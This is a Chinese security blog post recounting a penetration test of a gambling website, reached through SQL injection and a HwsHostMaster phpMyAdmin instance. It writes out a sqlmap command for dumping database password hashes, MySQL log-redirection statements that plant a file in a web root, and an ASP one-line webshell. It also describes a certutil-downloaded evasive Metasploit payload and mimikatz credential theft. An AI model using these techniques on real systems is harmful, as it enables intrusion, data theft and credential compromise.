记一次菠菜站对护卫神的利用

  • A+
所属分类:安全文章
记一次菠菜站对护卫神的利用

点击蓝字关注我哦


记一次菠菜站对护卫神的利用

因为这个站是几个月前日的了,所以图片可能不全,也没办法再补图。

写这篇文章的时候,隔壁情侣正在鼓掌,声音贼响,导致我写的东西可能没有过一遍脑子,写的可能有点混乱。另外值得一提的是,为啥我们做安全的经常隔壁碰到这种人?

记一次菠菜站对护卫神的利用

记一次菠菜站对护卫神的利用

记一次菠菜站对护卫神的利用

已知目标网站

记一次菠菜站对护卫神的利用

之前客户有给过这种网站,所以我记忆尤深,针对这种站一般你可以直接放弃正常测试流程了,因为经验告诉我,网站主站功能基本上很少有漏洞的,只能从旁站下手。

 

Ctrl+u查看一波没发现有什么存在泄漏的js,回过头发现发现网站右上角有个优惠活动大厅

记一次菠菜站对护卫神的利用

打开后页面似曾相识

记一次菠菜站对护卫神的利用

随便点开一个活动,好像可以随便提交文字,没有过滤,我信心满满输入xss,提交,然而两天过去了,并没什么叼用,我当时的心情真是像云像雾又像雨。

记一次菠菜站对护卫神的利用

然而我又发现下面有个审核进度查询,打开后会让你输入用户名,既然有输入用户名,那应该就是有带入数据库查询,习惯性加了个点击查询,10秒过去了,没响应,我懵了,输入正常不存在的账号测试,是会弹出记录的,但是加单引号查询却一点响应都没有。

F12-network抓包,发现是有发送请求的,很明显了,有注入,而且报错是页面是thinkphp,从最下角看版本是3.2.3,这个版本真的是hc的最爱,从色情到贷款平台,再到菠菜都是这个版本的thinkphp。

记一次菠菜站对护卫神的利用

先注入一波试试

记一次菠菜站对护卫神的利用

抓包Sqlmap一波拿到了管理员账号密码,突然我意识到,我没有后台地址,拿到了也没叼用。

Fofa一波得到真实ip,发现999端口存在phpmyadmin服务,6588有一个标题为护卫神丶主机大师的asp站。目录爆破,端口扫描,子域名挖掘,都没有找到后台地址。

记一次菠菜站对护卫神的利用

Os-shell成功,但是不管我输入什么都没反应。

Sql-shell也一样,仔细观察发现,网站路径是装在护卫神的。

记一次菠菜站对护卫神的利用

有可能是护卫神拦截了,当时我还疑惑,这php的站,你用护卫神是什么意思。

 

等到十分钟后百度了一下hwshostmaster,我才知道我是多么无知,原来护卫神不是光有waf,他还有一个叫主机大师的服务,大概功能与phpstudy相同。

 

本地安装观察,发现主机大师默认安装后会在999端口启动phpmyadmin,6588端口则启动主机大师默认的管理页面,与我观察的目标ip端口一致。

记一次菠菜站对护卫神的利用

记一次菠菜站对护卫神的利用

既然目标站有phpmyadmin,那我就可以尝试使用sqlmap枚举一下对方数据库账号与密码hash。

Sqlmap –r sql.txt --string="Surname" --users --password

 

Sqlmap枚举出来了root与test,root的密码没有破解出来,但是test的密码破解出来为1234。登陆成功。

记一次菠菜站对护卫神的利用

关于这种情况拿shell,木神的黑白天公众号里有篇文章<phpMyAdmin 渗透利用总结

>已经写的很详细了,木神看到这篇文章麻烦找我结一下广告费。

 

mysql数据库getshell一般有两种方法,into outfile,导出日志。

根据注入报错页面的文件地址

记一次菠菜站对护卫神的利用

构造语句

select 1 into outfile 'D:/wwwroot/xxx.com/web/1.txt'

报错#1 - Can't create/write to file应该是没有权限

记一次菠菜站对护卫神的利用

尝试使用日志写入,先开启日志,然后

set global  general_log_file =" D:\wwwroot\xxx.com\web\a.php"

好像还是不行,我裂开了。

记一次菠菜站对护卫神的利用

突然我想到,既然这个wwwroot目录没有权限,那么护卫神主机大师管理页面是否可以利用一下呢 ,翻了一下本地安装的主机大师文件,可以确认主机大师的管理页面绝对路径是D:Hws.comHwsHostMasterhostweb

尝试修改日志

Set global  general_log_file =" D:\Hws.com\HwsHostMaster\host\web\1.asp"

成功。

记一次菠菜站对护卫神的利用

然后执行

select “<%eval request("chopper")%>”

访问http://xxx.xxx.xxx.xxx:6588/1.asp报错404,这个问题难了我好久,后来我才发现,需要把日志文件换成其他的,当前日志文件才可以访问。

Cknife连接成功

记一次菠菜站对护卫神的利用

Whoami发现是system权限,那么剩下的就简单了,为了防止护卫神查杀,生成了个msf免杀马,通过certutil下载,然后执行,msf上线,然后迁移进程,load mimikatz,一套下来拿到了远程账号密码,脱裤打包源码,提交给客户,完事。





记一次菠菜站对护卫神的利用

END

记一次菠菜站对护卫神的利用


记一次菠菜站对护卫神的利用


看完记得点赞,关注哟,爱您!


请严格遵守网络安全法相关条例!此分享主要用于学习,切勿走上违法犯罪的不归路,一切后果自付!



关注此公众号,回复"Gamma"关键字免费领取一套网络安全视频以及相关书籍,公众号内还有收集的常用工具!

在看你就赞赞我!
记一次菠菜站对护卫神的利用

记一次菠菜站对护卫神的利用
记一次菠菜站对护卫神的利用
记一次菠菜站对护卫神的利用
扫码关注我们
记一次菠菜站对护卫神的利用


扫码领hacker资料,常用工具,以及各种福利


记一次菠菜站对护卫神的利用

转载是一种动力 分享是一种美德

          




本文始发于微信公众号(Gamma安全实验室):记一次菠菜站对护卫神的利用

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: